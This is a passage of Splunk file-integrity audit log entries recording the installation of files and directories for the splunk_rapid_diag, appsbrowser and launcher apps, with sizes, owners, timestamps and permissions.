size=356, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.796, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/cli/__main__.py", isdir=0, size=19560, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:37.792, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/cli/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.789, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/trigger.py", isdir=0, size=3382, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.784, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/search_debug.py", isdir=0, size=19133, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.780, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/resource_usage_metrics.py", isdir=0, size=6187, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/resource_usage_collector_factory.py", isdir=0, size=1759, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.769, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/resource_usage_collector.py", isdir=0, size=830, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.764, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/resource_monitor_trackers.py", isdir=0, size=4722, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.760, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/resource_monitor.py", isdir=0, size=4972, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.756, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/periodic.py", isdir=0, size=5118, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.752, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/monitored_file.py", isdir=0, size=3773, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.746, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/log_monitor.py", isdir=0, size=7613, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.739, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger/__init__.py", isdir=0, size=103, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.634, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/worker.py", isdir=0, size=1672, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.629, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/trigger", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:37.625, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/tools_collector.py", isdir=0, size=4475, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.620, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/tool_manager.py", isdir=0, size=6387, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.616, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/threadpool.py", isdir=0, size=5449, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.613, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/system_call_trace.py", isdir=0, size=11923, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.609, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/stack_trace.py", isdir=0, size=12913, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/search_result.py", isdir=0, size=6390, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.602, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/resource.py", isdir=0, size=2877, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.597, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/ps.py", isdir=0, size=7077, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.594, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/performance_counter.py", isdir=0, size=2231, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.588, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/network_packet.py", isdir=0, size=11850, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.584, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/netstat.py", isdir=0, size=7599, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.580, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/lsof.py", isdir=0, size=9924, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.576, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/iops.py", isdir=0, size=9734, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.572, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/diag.py", isdir=0, size=5834, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.568, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/collector_result.py", isdir=0, size=5834, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.564, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/collector.py", isdir=0, size=9897, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.558, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector/__init__.py", isdir=0, size=124, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.353, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/util.py", isdir=0, size=8690, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.350, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/trace.py", isdir=0, size=1765, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.345, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/task_repr_generator.py", isdir=0, size=3134, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/task_handler.py", isdir=0, size=19176, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.338, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/task.py", isdir=0, size=39487, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/session_globals.py", isdir=0, size=1472, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.331, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/serializable.py", isdir=0, size=4671, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.327, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/process_match.py", isdir=0, size=850, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.322, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/process_abstraction.py", isdir=0, size=15506, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.318, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/detach_process.py", isdir=0, size=4421, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.314, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/debug_utils.py", isdir=0, size=631, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:32 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.310, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/conf_util.py", isdir=0, size=3046, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.305, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/collector", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:37.300, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.195, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/wmi.py", isdir=0, size=48360, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.191, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:37.187, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/tool_commands_endpoint.py", isdir=0, size=3608, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.183, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/task_run_endpoint.py", isdir=0, size=4187, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.179, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/task_rerun_endpoint.py", isdir=0, size=4295, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.174, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/task_information_endpoint.py", isdir=0, size=1743, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.170, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/task_export_endpoint.py", isdir=0, size=1742, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.166, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/task_delete_endpoint.py", isdir=0, size=3024, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.162, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/task_abort_endpoint.py", isdir=0, size=2670, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.157, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/static_task_information_endpoint.py", isdir=0, size=1067, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.153, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:37.149, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag_info_endpoint.py", isdir=0, size=4544, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.143, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag_handler_utils.py", isdir=0, size=6464, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.139, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/rapid_diag", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:37.134, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/pythoncom.py", isdir=0, size=138, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.129, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/process_list_endpoint.py", isdir=0, size=1919, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.125, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/logger_manager.py", isdir=0, size=3669, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.121, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/log_file_list_endpoint.py", isdir=0, size=1925, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.117, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/json_validation_endpoint.py", isdir=0, size=1667, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.113, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/filelock.py", isdir=0, size=12844, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.109, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/cli", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/static/appLogo_2x.png", isdir=0, size=2837, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.900, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/static/appLogo.png", isdir=0, size=1474, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.897, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/static/appIcon_2x.png", isdir=0, size=1434, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.894, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/static/appIconAlt_2x.png", isdir=0, size=1371, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.890, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/static/appIconAlt.png", isdir=0, size=784, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.887, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/static/appIcon.png", isdir=0, size=830, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.783, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.779, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.776, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/license-eula.txt", isdir=0, size=123510, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.773, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/license-eula.rtf", isdir=0, size=645081, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.769, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.766, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.762, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.758, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.754, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/README.txt", isdir=0, size=179, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.750, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.744, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/default/data/ui/manager/apps_remote.xml", isdir=0, size=173, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.741, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/default/data/ui/manager/apps_remote.prod_lite.xml", isdir=0, size=104, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.634, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/default/data/ui/manager", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.631, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.627, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.622, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/default/app.conf", isdir=0, size=277, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.617, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/metadata/default.meta", isdir=0, size=166, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.613, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.610, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:36.606, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/searchIcon.png", isdir=0, size=864, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.602, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/logo_bkgrd.png", isdir=0, size=12693, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.598, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_update_ie6.png", isdir=0, size=457, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.593, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_update.png", isdir=0, size=504, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.590, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_tutorial.png", isdir=0, size=3452, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.586, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_setup_ie6.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.581, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_setup.png", isdir=0, size=3035, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.577, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_reorderHandler_ie6.png", isdir=0, size=438, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.573, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_reorderHandler.png", isdir=0, size=515, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.569, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_mail.png", isdir=0, size=847, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.565, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_file.png", isdir=0, size=3318, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.561, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_document.png", isdir=0, size=3442, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.557, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_circle_add.png", isdir=0, size=270, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.553, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_ask.png", isdir=0, size=316, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.548, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_apps.png", isdir=0, size=1527, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.545, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/icon_addData.png", isdir=0, size=1465, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.541, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/bg_tabs.png", isdir=0, size=2955, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.533, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher/appserver/static/images/bg_gradient_100.png", isdir=0, size=421, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:36.329, user=n/a, 